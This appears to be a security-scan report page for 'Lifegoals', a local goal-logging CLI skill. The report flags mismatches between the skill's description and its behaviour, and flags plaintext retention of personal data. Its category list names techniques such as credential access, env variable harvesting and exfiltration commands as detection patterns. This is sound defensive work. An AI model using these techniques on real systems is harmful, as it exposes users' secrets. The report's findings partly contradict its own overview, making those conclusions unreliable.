Lifegoals

Security checks across malware telemetry and agentic risk

Overview

This skill is an offline local goal-logging CLI; it stores personal goal text on disk, but that behavior is disclosed and no hidden network, credential, or destructive behavior was found.

Install only if you are comfortable with your goal text being saved in plaintext under ~/.local/share/lifegoals and later searchable/exportable. Avoid entering secrets or highly sensitive personal details, inspect the Bash script before putting it on your PATH, and manually delete the data directory when you no longer want the history retained.

SkillSpector

By NVIDIA

Vulnerability Patterns

Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code

Findings (10)

Tp4

High

Category: MCP Tool Poisoning
Confidence: 92% confidence
Finding: The skill is presented as a life-goal planner, but its documented behavior is a generic logging/export toolkit that stores arbitrary user inputs with history, search, and export features. This mismatch can mislead users and downstream agents about the true data-handling behavior, increasing the chance that sensitive personal content is entered without informed consent.

Description-Behavior Mismatch

High

Confidence: 97% confidence
Finding: The implementation materially diverges from the declared life-goals purpose and instead exposes a generic input-logging utility with devtools-themed commands. This mismatch is dangerous because users and host platforms may grant trust or provide sensitive planning data under false expectations, while the tool silently stores arbitrary content unrelated to the advertised function.

Intent-Code Divergence

Medium

Confidence: 94% confidence
Finding: Labeling the script as a 'devtools' utility directly contradicts the advertised life-goals skill and indicates deceptive or careless packaging. While not directly exploitable as code execution, this kind of identity mismatch undermines informed consent and can hide data-collection behavior behind an unrelated description.

Intent-Code Divergence

Medium

Confidence: 95% confidence
Finding: The help text presents the tool as a generic 'devtools toolkit' with commands unrelated to life-goal planning, reinforcing that the delivered artifact does not match user expectations. In a skill context, this misrepresentation increases risk because users may disclose sensitive personal information to a tool whose real function is broader data capture and logging.

Missing User Warnings

Medium

Confidence: 95% confidence
Finding: The skill advertises offline use and auditability but does not clearly warn users that their goal text and activity history are persistently retained. Because life goals often contain sensitive health, financial, relationship, or career information, omission of a prominent retention warning can cause users to disclose private data they would not otherwise store.

Missing User Warnings

Medium

Confidence: 98% confidence
Finding: The script persistently writes raw user input to files under the user's home directory without clear disclosure, consent, retention limits, or masking of sensitive content. In a life-goals context, inputs may contain highly personal plans, health, financial, or relationship information, so silent logging creates a meaningful privacy and confidentiality risk.

Ssd 3

Medium

Confidence: 94% confidence
Finding: The skill explicitly promotes persistent logging and full activity history for user-supplied goals, which can include highly sensitive personal plans and circumstances. Plaintext local retention and disclosure-oriented features such as exports increase the likelihood of privacy harm from shoulder surfing, device compromise, shared accounts, backups, or accidental file sharing.

Ssd 3

Medium

Confidence: 96% confidence
Finding: Documenting that inputs are timestamped, saved, later displayed, searched, and exported creates a broad plaintext exposure path for everything users type into the tool. In this context, the affected content is personal life-planning data, making the aggregation and retrieval features especially privacy-invasive even without network exfiltration.

Ssd 3

Medium

Confidence: 95% confidence
Finding: The storage layout normalizes keeping unified history logs and generated export files for all entries in a predictable directory under the user's home folder. Centralized plaintext storage plus export artifacts materially increases the blast radius of accidental disclosure or local compromise because all sensitive goal content becomes easy to enumerate and copy.

Ssd 3

Medium

Confidence: 97% confidence
Finding: The tool is designed to accumulate arbitrary user-provided content over time and then expose it via search, recent-history display, and bulk export commands. In the context of a life-goals assistant, this materially increases the danger because the collected data is likely sensitive and the script offers convenient mechanisms for mass retrieval, accidental disclosure, or abuse by other local actors with access to the account.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal